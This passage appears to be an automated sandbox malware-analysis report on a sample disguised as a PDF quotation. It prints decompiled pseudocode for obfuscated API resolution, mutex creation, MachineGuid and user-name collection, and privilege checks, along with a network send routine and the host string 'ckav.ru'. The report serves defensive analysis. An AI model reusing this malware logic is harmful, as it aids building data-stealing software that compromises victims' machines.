                							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                							 *_t33(_t35, _t46, 0x8000);
                							_t35 = _t46;
                						}
                						L9:
                						E00403C40(_t45); // executed
                						goto L10;
                					}
                				}
                			}

                APIs
                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: File$AllocCreateReadVirtual
                • String ID: .tmp
                • API String ID: 3585551309-2986845003
                • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E00413866(void* __eflags) {
                				short _v6;
                				short _v8;
                				short _v10;
                				short _v12;
                				short _v14;
                				short _v16;
                				short _v18;
                				short _v20;
                				short _v22;
                				char _v24;
                				short _v28;
                				short _v30;
                				short _v32;
                				short _v34;
                				short _v36;
                				short _v38;
                				short _v40;
                				short _v42;
                				short _v44;
                				short _v46;
                				char _v48;
                				short _v52;
                				short _v54;
                				short _v56;
                				short _v58;
                				short _v60;
                				short _v62;
                				short _v64;
                				short _v66;
                				short _v68;
                				short _v70;
                				short _v72;
                				short _v74;
                				char _v76;
                				void* __ebx;
                				void* __edi;
                				void* _t38;
                				short _t43;
                				short _t44;
                				short _t45;
                				short _t46;
                				short _t47;
                				short _t48;
                				short _t50;
                				short _t51;
                				short _t52;
                				short _t54;
                				short _t55;
                				intOrPtr* _t57;
                				intOrPtr* _t59;
                				intOrPtr* _t61;
                				void* _t63;
                				WCHAR* _t65;
                				long _t68;
                				void* _t75;
                				short _t76;
                				short _t78;
                				short _t83;
                				short _t84;
                				short _t85;
                
                				E00402C6C(_t38);
                				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                				SetErrorMode(3); // executed
                				_t43 = 0x4f;
                				_v76 = _t43;
                				_t44 = 0x4c;
                				_v74 = _t44;
                				_t45 = 0x45;
                				_v72 = _t45;
                				_t46 = 0x41;
                				_v70 = _t46;
                				_t47 = 0x55;
                				_v68 = _t47;
                				_t48 = 0x54;
                				_t76 = 0x33;
                				_t84 = 0x32;
                				_t83 = 0x2e;
                				_t78 = 0x64;
                				_t85 = 0x6c;
                				_v66 = _t48;
                				_v52 = 0;
                				_t50 = 0x77;
                				_v48 = _t50;
                				_t51 = 0x73;
                				_v46 = _t51;
                				_t52 = 0x5f;
                				_v42 = _t52;
                				_v28 = 0;
                				_t54 = 0x6f;
                				_v24 = _t54;
                				_t55 = 0x65;
                				_v20 = _t55;
                				_v64 = _t76;
                				_v62 = _t84;
                				_v60 = _t83;
                				_v58 = _t78;
                				_v56 = _t85;
                				_v54 = _t85;
                				_v44 = _t84;
                				_v40 = _t76;
                				_v38 = _t84;
                				_v36 = _t83;
                				_v34 = _t78;
                				_v32 = _t85;
                				_v30 = _t85;
                				_v22 = _t85;
                				_v18 = _t76;
                				_v16 = _t84;
                				_v14 = _t83;
                				_v12 = _t78;
                				_v10 = _t85;
                				_v8 = _t85;
                				_v6 = 0;
                				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                				 *_t57( &_v76);
                				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                				 *_t59( &_v48);
                				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                				_t81 =  &_v24;
                				 *_t61( &_v24); // executed
                				_t63 = E00414059(); // executed
                				if(_t63 != 0) {
                					_t65 = E00413D97(0);
                					E004031E5(0, 0, 0xcf167df4, 0, 0);
                					CreateMutexW(0, 1, _t65); // executed
                					_t68 = GetLastError();
                					_t92 = _t68 - 0xb7;
                					if(_t68 == 0xb7) {
                						E00413B81(0);
                						_pop(_t81); // executed
                					}
                					E00413003(_t92); // executed
                					E00412B2E(_t92); // executed
                					E00412D31(_t81, _t84); // executed
                					E00413B3F();
                					E00413B81(0);
                					 *0x49fdd0 = 1;
                				}
                				return 0;
                			}

                APIs
                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                • GetLastError.KERNEL32 ref: 0041399E
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Error$CreateLastModeMutex
                • String ID:
                • API String ID: 3448925889-0
                • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                				long _v8;
                				void* _t7;
                				long _t10;
                				void* _t21;
                				struct _OVERLAPPED* _t24;
                
                				_t14 = __ebx;
                				_t24 = 0;
                				_v8 = 0;
                				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                				_t21 = _t7;
                				if(_t21 != 0xffffffff) {
                					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                					if(_t10 != 0xffffffff) {
                						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                						_t24 =  !=  ? 1 : 0;
                					}
                					E00403C40(_t21); // executed
                				}
                				return _t24;
                			}

                APIs
                • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: File$CreatePointerWrite
                • String ID:
                • API String ID: 3672724799-0
                • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 34%
                			E00412D31(void* __ecx, void* __edi) {
                				long _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				char _v24;
                				char _v40;
                				void* __ebx;
                				intOrPtr* _t10;
                				void* _t11;
                				void* _t25;
                				void* _t26;
                				void* _t27;
                				void* _t35;
                				void* _t53;
                				char* _t57;
                				void* _t58;
                				void* _t61;
                				void* _t64;
                				void* _t65;
                				intOrPtr* _t66;
                				void* _t67;
                				void* _t68;
                				void* _t69;
                				void* _t70;
                				void* _t71;
                				void* _t72;
                				void* _t73;
                
                				_t53 = __ecx;
                				_t10 =  *0x49fde0;
                				_t68 = _t67 - 0x24;
                				 *0x49fddc = 0x927c0;
                				 *0x49fde4 = 0;
                				_t75 = _t10;
                				if(_t10 != 0) {
                					L16:
                					_push(1);
                					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                					_t61 = _t11;
                					_t68 = _t68 + 0xc;
                					if(_t61 != 0) {
                						E004031E5(0, 0, 0xfcae4162, 0, 0);
                						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                					}
                					L004067C4(0xea60); // executed
                					_pop(_t53);
                				} else {
                					_push(__edi);
                					 *0x49fde0 = E004056BF(0x2bc);
                					E00413DB7(_t53, _t75,  &_v40);
                					_t57 =  &_v24;
                					asm("movsd");
                					asm("movsd");
                					asm("movsd");
                					asm("movsd");
                					E004058D4( *0x49fde0, 0x12);
                					E004058D4( *0x49fde0, 0x28);
                					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                					_t69 = _t68 + 0x28;
                					_t64 = E0040632F();
                					_push(0);
                					_push(1);
                					if(_t64 == 0) {
                						_push(0);
                						_push( *0x49fde0);
                						E00405872();
                						_t70 = _t69 + 0x10;
                					} else {
                						_push(_t64);
                						_push( *0x49fde0);
                						E00405872();
                						E00402BAB(_t64);
                						_t70 = _t69 + 0x14;
                					}
                					_t58 = E00406130(_t57);
                					_push(0);
                					_push(1);
                					_t77 = _t64;
                					if(_t64 == 0) {
                						_push(0);
                						_push( *0x49fde0);
                						_t25 = E00405872();
                						_t71 = _t70 + 0x10; // executed
                					} else {
                						_push(_t58);
                						_push( *0x49fde0);
                						E00405872();
                						_t25 = E00402BAB(_t58);
                						_t71 = _t70 + 0x14;
                					}
                					_t26 = E004061C3(_t25, 0, _t77); // executed
                					_t65 = _t26;
                					_push(0);
                					_push(1);
                					if(_t65 == 0) {
                						_push(0);
                						_push( *0x49fde0);
                						_t27 = E00405872();
                						_t72 = _t71 + 0x10;
                					} else {
                						_push(_t65);
                						_push( *0x49fde0);
                						E00405872();
                						_t27 = E00402BAB(_t65);
                						_t72 = _t71 + 0x14;
                					}
                					_t66 = E00406189(_t27);
                					_t79 = _t66;
                					if(_t66 == 0) {
                						E00405781( *0x49fde0, 0);
                						E00405781( *0x49fde0, 0);
                						_t73 = _t72 + 0x10;
                					} else {
                						E00405781( *0x49fde0,  *_t66);
                						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                						E00402BAB(_t66);
                						_t73 = _t72 + 0x14;
                					}
                					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                					_t35 = E0040642C(_t79); // executed
                					E004058D4( *0x49fde0, _t35);
                					E004058D4( *0x49fde0, _v24);
                					E004058D4( *0x49fde0, _v20);
                					E004058D4( *0x49fde0, _v16);
                					E004058D4( *0x49fde0, _v12);
                					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                					_t68 = _t73 + 0x48;
                				}
                				_t80 =  *0x49fde4;
                				if( *0x49fde4 == 0) {
                					_t10 =  *0x49fde0;
                					goto L16;
                				}
                				return E00405695(_t53,  *0x49fde0);
                			}































                APIs
                • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                  • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                  • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                  • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Heap$CreateFreeProcessThread_wmemset
                • String ID: ckav.ru
                • API String ID: 2915393847-2696028687
                • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040632F() {
                				char _v8;
                				void* _t4;
                				void* _t7;
                				void* _t16;
                
                				_t16 = E00402B7C(0x208);
                				if(_t16 == 0) {
                					L4:
                					_t4 = 0;
                				} else {
                					E0040338C(_t16, 0, 0x104);
                					_t1 =  &_v8; // 0x4143e8
                					_v8 = 0x208;
                					_t7 = E00406069(_t16, _t1); // executed
                					if(_t7 == 0) {
                						E00402BAB(_t16);
                						goto L4;
                					} else {
                						_t4 = _t16;
                					}
                				}
                				return _t4;
                			}








                APIs
                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                • _wmemset.LIBCMT ref: 0040634F
                  • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateNameProcessUser_wmemset
                • String ID: CA
                • API String ID: 2078537776-1052703068
                • Opcode ID: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                • Opcode Fuzzy Hash: f2258d9b8330d324457b64b56ec83946477e708dba813dda8b6774b529cb1dca
                • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                				int _t7;
                				void* _t8;
                
                				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                				return _t7;
                			}






                APIs
                • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: InformationToken
                • String ID: IDA
                • API String ID: 4114910276-365204570
                • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                				_Unknown_base(*)()* _t5;
                				void* _t6;
                
                				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                				_t1 =  &_a8; // 0x403173
                				_t5 = GetProcAddress(_a4,  *_t1); // executed
                				return _t5;
                			}






                APIs
                • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc
                • String ID: s1@
                • API String ID: 190572456-427247929
                • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00404A52(void* _a4, char* _a8, char* _a12) {
                				void* _v8;
                				int _v12;
                				void* __ebx;
                				char* _t10;
                				long _t13;
                				char* _t27;
                
                				_push(_t21);
                				_t27 = E00402B7C(0x208);
                				if(_t27 == 0) {
                					L4:
                					_t10 = 0;
                				} else {
                					E00402B4E(_t27, 0, 0x208);
                					_v12 = 0x208;
                					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                					if(_t13 != 0) {
                						E00402BAB(_t27);
                						goto L4;
                					} else {
                						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                						E00404A39(_v8); // executed
                						_t10 = _t27;
                					}
                				}
                				return _t10;
                			}










                APIs
                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocateOpenProcessQueryValue
                • String ID:
                • API String ID: 1425999871-0
                • Opcode ID: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                • Opcode Fuzzy Hash: 8a65b5e102e28de28ef59c05438bd133f995ad554f34eb9b6244912b3c07c856
                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402BAB(void* _a4) {
                				void* _t3;
                				char _t5;
                
                				if(_a4 != 0) {
                					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                					return _t5;
                				}
                				return _t3;
                			}






                APIs
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Heap$FreeProcess
                • String ID:
                • API String ID: 3859560861-0
                • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 40%
                			E004060BD(void* __eflags) {
                				signed int _v8;
                				char _v12;
                				short _v16;
                				char _v20;
                				void* __ebx;
                				intOrPtr* _t12;
                				signed int _t13;
                				intOrPtr* _t14;
                				signed int _t15;
                				void* _t24;
                
                				_v16 = 0x500;
                				_v20 = 0;
                				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                				_v8 = _t13;
                				if(_t13 != 0) {
                					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                					asm("sbb eax, eax");
                					_v8 = _v8 &  ~_t15;
                					E0040604F(_v12);
                					return _v8;
                				}
                				return _t13;
                			}














                APIs
                • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: CheckMembershipToken
                • String ID:
                • API String ID: 1351025785-0
                • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                				void* _t3;
                				int _t5;
                
                				_t3 = E00403D4D(__eflags, _a4); // executed
                				if(_t3 == 0) {
                					__eflags = 0;
                					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                					_t5 = CreateDirectoryW(_a4, 0); // executed
                					return _t5;
                				} else {
                					return 1;
                				}
                			}






                APIs
                • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: CreateDirectory
                • String ID:
                • API String ID: 4241100979-0
                • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E0040642C(void* __eflags) {
                				short _v40;
                				intOrPtr* _t6;
                				void* _t10;
                
                				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                				 *_t6( &_v40); // executed
                				return 0 | _v40 == 0x00000009;
                			}







                APIs
                • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: InfoNativeSystem
                • String ID:
                • API String ID: 1721193555-0
                • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				intOrPtr _t5;
                
                				_t5 = _a12;
                				if(_t5 == 0) {
                					_t5 = E00405D0B(_a8) + 1;
                				}
                				__imp__#19(_a4, _a8, _t5, 0); // executed
                				return _t5;
                			}





                APIs
                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: send
                • String ID:
                • API String ID: 2809346765-0
                • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                				int _t6;
                				void* _t7;
                
                				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                				return _t6;
                			}






                APIs
                • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: FileMove
                • String ID:
                • API String ID: 3562171763-0
                • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
